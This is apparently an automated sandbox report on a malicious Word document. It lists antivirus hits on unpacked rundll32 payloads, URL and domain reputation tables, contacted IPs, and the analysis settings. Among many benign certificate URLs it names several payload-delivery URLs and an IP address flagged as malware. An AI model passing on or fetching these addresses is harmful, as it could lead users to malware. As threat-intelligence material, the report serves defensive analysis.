7.2.rundll32.exe.430000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
17.2.rundll32.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.1b0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
22.2.rundll32.exe.450000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
20.2.rundll32.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.280000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.a-cert.at0E	0%	URL Reputation	safe
http://www.a-cert.at0E	0%	URL Reputation	safe
http://www.a-cert.at0E	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://nightlifemumbai.club/x/0wBD3/	100%	Avira URL Cloud	malware
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://www.certifikat.dk/repository0	0%	URL Reputation	safe
http://nightlifemumbai.club	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
https://traumfrauen-ukraine.de	0%	Avira URL Cloud	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0	0%	URL Reputation	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0	0%	URL Reputation	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://traumfrauen-ukraine.de/bin/JyeS/	0%	Avira URL Cloud	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://www.post.trust.ie/reposit/cps.html0	0%	URL Reputation	safe
http://traumfrauen-ukraine.de	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	URL Reputation	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	URL Reputation	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	URL Reputation	safe
http://www.globaltrust.info0=	0%	Avira URL Cloud	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E	0%	URL Reputation	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E	0%	URL Reputation	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.valicert.1	0%	Avira URL Cloud	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
https://shop.nowfal.dev/wp-includes/RlMObf2j0/	100%	Avira URL Cloud	malware
http://ocsp.sectigo.com0/	0%	Avira URL Cloud	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://190.55.186.229/pvaadnb3/	0%	Avira URL Cloud	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.rootca.or.kr/rca/cps.html0	0%	URL Reputation	safe
http://www.rootca.or.kr/rca/cps.html0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
shop.nowfal.dev	104.21.88.166	true	true	unknown
traumfrauen-ukraine.de	212.227.200.73	true	true	unknown
nightlifemumbai.club	172.217.6.174	true	true	unknown
jflmktg.wpcomstaging.com	192.0.78.20	true	true	unknown
e-wdesign.eu	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nightlifemumbai.club/x/0wBD3/	true	Avira URL Cloud: malware	unknown
http://traumfrauen-ukraine.de/bin/JyeS/	true	Avira URL Cloud: safe	unknown
http://190.55.186.229/pvaadnb3/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.a-cert.at0E	powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3.crl0	powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.e-me.lv/repository0	powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org/doc0	powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0	powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certifikat.dk/repository0	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://nightlifemumbai.club	powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.swisssign.com/0	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false		high
http://crl.ssc.lt/root-c/cacrl.crl0	powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://traumfrauen-ukraine.de	powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0	powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3P.crl0	powershell.exe, 00000005.00000002.2334351202.000000001CF80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.infonotary.com/cps/qcps.html0$	powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.post.trust.ie/reposit/cps.html0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://traumfrauen-ukraine.de	powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.certplus.com/CRL/class2.crl0	powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.sk/ca/crl/ca_disig.crl0	powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.infonotary.com/responder.cgi0V	powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.globaltrust.info0=	powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	low
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E	powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	powershell.exe, 00000005.00000002.2336945072.000000001D560000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.valicert.1	powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.ssc.lt/cps03	powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://shop.nowfal.dev/wp-includes/RlMObf2j0/	powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://ocsp.sectigo.com0/	powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2334588090.0000000001DC0000.00000002.00000001.sdmp	false		high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=	powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.gva.es0	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.oces.certifikat.dk/oces.crl0	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	false		high
http://crl.pki.wellsfargo.com/wsprca.crl0	powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp	false		high
http://www.dnie.es/dpc0	powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.rootca.or.kr/rca/cps.html0	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustcenter.de/guidelines0	powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0	powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.globaltrust.info0	powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certificates.starfieldtech.com/repository/1604	powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp	false		high
http://www.entrust.net/CRL/Client1.crl0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false		high
http://www.entrust.net/CRL/net1.crl0	powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp	false		high
https://www.catcert.net/verarrel	powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.sk/ca0f	powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/	powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.e-szigno.hu/RootCA.crl	powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	false		high
http://www.signatur.rtr.at/current.crl0	powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl0	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.quovadis.bm0	powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0	powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.firmaprofesional.com0	powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.netlock.net/docs	powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl	powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp	false		high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/publicnotaryroot.html0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.e-trust.be/CPS/QNcerts	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/certicamaraca.crl0	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	false		high
https://jflmktg.wpcomstaging.com/wp-content/AK/	powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0	powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net03	powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://shop.nowfal.dev	powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.acabogacia.org0	powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.valicert.	powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ca.sia.it/seccli/repository/CPS0	powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://e-wdesign.eu/wp-content/bn1IgDejh/	powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl0	powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/certicamaraca.crl0;	powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	false		high
http://www.e-szigno.hu/RootCA.crt0	powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	false		high
http://www.quovadisglobal.com/cps0	powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	false		high
http://www.valicert.com/1	powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.e-szigno.hu/SZSZ/0	powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://traumfrauen-ukraine.de/bin/JyeS/	powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ca.sia.it/secsrv/repository/CRL.der0J	powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com	powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	false		high
https://sectigo.com/CPS0	powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	false		high
http://www.ancert.com/cps0	powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.88.166	unknown	United States	13335	CLOUDFLARENETUS	true
192.0.78.20	unknown	United States	2635	AUTOMATTICUS	true
212.227.200.73	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
172.217.6.174	unknown	United States	15169	GOOGLEUS	true
190.55.186.229	unknown	Argentina	27747	TelecentroSAAR	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	343979
Start date:	25.01.2021
Start time:	20:09:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	N00048481397007.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@44/12@6/5
EGA Information:	Successful, ratio: 88.9%
HDC Information:	Successful, ratio: 8.4% (good quality ratio 8%) Quality average: 72% Quality standard deviation: 25.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net Execution Graph export aborted for target powershell.exe, PID 2280 because it is empty Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/343979/sample/N00048481397007.doc

Simulations

Behavior and APIs

Time	Type	Description
20:10:42	API Interceptor	1x Sleep call for process: msg.exe modified
20:10:43	API Interceptor	493x Sleep call for process: powershell.exe modified
20:12:35	API Interceptor	416x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

